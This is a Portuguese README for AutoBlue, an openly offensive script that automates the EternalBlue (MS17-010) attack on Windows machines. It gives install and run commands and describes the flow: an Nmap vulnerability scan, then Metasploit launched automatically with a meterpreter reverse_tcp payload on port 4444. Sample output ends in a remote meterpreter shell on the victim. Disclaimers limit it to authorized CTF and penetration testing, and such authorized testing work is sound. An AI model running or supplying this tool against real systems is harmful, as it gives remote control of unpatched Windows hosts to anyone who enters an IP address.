
AutoBlue - Ferramenta automatizada de exploração do EternalBlue (CVE-2017-0144 / MS17-010) que utiliza Nmap e Metasploit para hacking ético, testes de penetração e desafios CTF. Estritamente para uso autorizado e educacional!
AUTOBLUE é uma ferramenta de automação projetada para explorar a vulnerabilidade EternalBlue (CVE-2017-0144) em máquinas Windows. A ferramenta integra o poder do Nmap para varredura de vulnerabilidades e do Metasploit's msfconsole para exploração, permitindo que os usuários identifiquem automaticamente sistemas vulneráveis e lancem o exploit EternalBlue para obter acesso remoto ao alvo.
Esta ferramenta é projetada principalmente para profissionais de segurança, testadores de penetração e hackers éticos que trabalham em ambientes controlados e autorizados, como desafios Capture The Flag (CTF), engajamentos de teste de penetração ou configurações de laboratório. AUTOBLUE permite que os usuários explorem a vulnerabilidade EternalBlue com intervenção manual mínima, bastando inserir o endereço IP do alvo.
Recursos
Varredura Automatizada de Vulnerabilidades: Usa o Nmap para verificar a vulnerabilidade EternalBlue (CVE-2017-0144) na máquina alvo.
Exploração Sem Costura: Utiliza o Metasploit's msfconsole para lançar o exploit EternalBlue automaticamente.
Configuração Simples: Requer apenas um endereço IP alvo e um ambiente de trabalho com Nmap e Metasploit instalados.
Relatório de Saída: Gera saída indicando sucesso ou falha da tentativa de exploração.
Índice
Pré-requisitos
Instalação
Uso
Como Funciona
Considerações de Segurança
Contribuição
Licença
Agradecimentos
Aviso Legal
Pré-requisitos:
Antes de usar o AUTOBLUE, certifique-se de que as seguintes ferramentas estão instaladas na sua máquina:
Nmap: Uma ferramenta de varredura de rede para detectar máquinas vulneráveis.
Metasploit Framework: Uma plataforma de teste de penetração que inclui exploits para EternalBlue.
Instalar o Nmap:
Copiar código
sudo apt update
e
sudo apt install nmap
No Windows ou macOS, baixe o Nmap do site oficial.
Instalar o Metasploit:
No Linux (baseado em Debian):
Copiar código
sudo apt update
e
sudo apt install metasploit-framework
No Windows ou macOS, baixe o Metasploit do site oficial.
Instalação:
Para instalar o AUTOBLUE, siga estas etapas:
Clone o repositório:
git clone https://github.com/AtithKhawas/autoblue.git
e
cd autoblue
Certifique-se de que o Nmap e o Metasploit estão instalados corretamente como pré-requisitos.
Torne o script executável:
chmod +x autoblue.sh
Uso:
AUTOBLUE é projetado para automatizar a varredura e exploração da vulnerabilidade EternalBlue. Veja como usá-lo:
Para usar o AUTOBLUE, execute o seguinte comando no seu terminal:
Copiar código
./autoblue.sh
Saída:
┌──(root㉿kali)-[/home/Elliot]
└─# ./autoblue.sh
============================================
********************************************
AutoBlue - EternalBlue Exploit Automation
********************************************
********************************************
------------------------Made by ATITH KHAWAS
============================================
Enter Target IP Address:
Ele solicitará o Endereço IP do Alvo e o seu.
Exemplo
Enter Target IP Address: Alvo<Endereço IP>
Enter Your IP Address: Seu <Endereço IP>
Assim que você executar a ferramenta, ela começará a varredura com o Nmap:
Saída-1
Target IP Address: ***.***.**.**
[+] Scanning Target for MS17-010 Vulnerability...
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 12:41 EST
Nmap scan report for ***.***.**.**
Host is up (0.19s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
[+] Target is VULNERABLE to EternalBlue!
É aqui que o trabalho real começa, reduzindo significativamente o processo demorado. Se o alvo for vulnerável, ele lança automaticamente o Msfconsole e define RHOSTS, PAYLOAD, LHOST e LPORT, sendo a porta padrão 4444.
Saída-2
[+] Launching Metasploit...
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
RHOSTS => ***.***.**.**
PAYLOAD => windows/x64/meterpreter/reverse_tcp
LHOST => ***.***.**.**
LPORT => 4444
[*] Started reverse TCP handler on ***.***.**.**:4444
E nos fornece o shell Meterpreter do alvo.
Saída-3
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > pwd
C:\Windows\system32
Como Funciona:
Varredura com Script Nmap: A ferramenta usa primeiro o Nmap Script Scan (--script smb-vuln-ms17-010) para detectar se a máquina alvo é vulnerável ao exploit EternalBlue. Ela verifica se a porta 445 está aberta e tenta identificar vulnerabilidades SMB.
Exploração com Metasploit: Se a máquina alvo for considerada vulnerável, o AUTOBLUE prossegue para lançar o exploit EternalBlue usando o Metasploit's msfconsole. O script configurará e enviará o payload necessário para explorar a vulnerabilidade.
Shell Reverso: Se o exploit for bem-sucedido, um shell reverso será aberto para fornecer uma interface de linha de comando na máquina vítima.
Feedback: A ferramenta fornece feedback ao longo do processo, incluindo se o alvo foi explorado com sucesso, e gera qualquer informação relevante (por exemplo, endereço IP do shell reverso).
Considerações de Segurança:
Uso Legal: Esta ferramenta deve ser usada apenas em ambientes autorizados. Certifique-se de ter permissão explícita para testar a máquina alvo e que isso não seja ilegal em sua jurisdição.
Entrada do Usuário: Certifique-se de que apenas IPs confiáveis sejam inseridos na ferramenta para evitar uso indevido. Executar esta ferramenta em sistemas não confiáveis pode levar a incidentes de segurança.
Segurança do Payload: O payload de shell reverso usado nesta ferramenta é inerentemente arriscado. Não exponha a máquina de ataque ou seus listeners a redes não confiáveis.
Mantenha as Dependências Atualizadas: Certifique-se de atualizar regularmente o Nmap e o Metasploit para mitigar vulnerabilidades de segurança conhecidas nessas ferramentas.
Contribuição:
Contribuições para o projeto AUTOBLUE são bem-vindas. Se você tiver sugestões, melhorias ou correções de bugs, sinta-se à vontade para bifurcar o repositório e criar um pull request.
Licença:
Esta ferramenta é de código aberto e distribuída sob a Licença MIT. Você é livre para usar, modificar e distribuir o software em seus próprios projetos. No entanto, você deve incluir este aviso em todas as cópias ou partes substanciais do software.
Agradecimentos:
Nmap: Por fornecer a funcionalidade essencial de varredura de vulnerabilidades.
Metasploit: Por fornecer a estrutura para explorar a vulnerabilidade EternalBlue.
Pesquisadores de Segurança: Por descobrir e divulgar publicamente a vulnerabilidade EternalBlue, o que ajudou a proteger sistemas em todo o mundo.
Aviso Legal:
AUTOBLUE é uma ferramenta destinada apenas para uso educacional e ético. Os autores não são responsáveis por quaisquer ações ilegais tomadas usando esta ferramenta. É sua responsabilidade garantir que você tenha permissão explícita para realizar testes de penetração em qualquer sistema.
Use esta ferramenta por sua própria conta e risco. Sempre realize atividades de teste de penetração em um ambiente seguro e legal.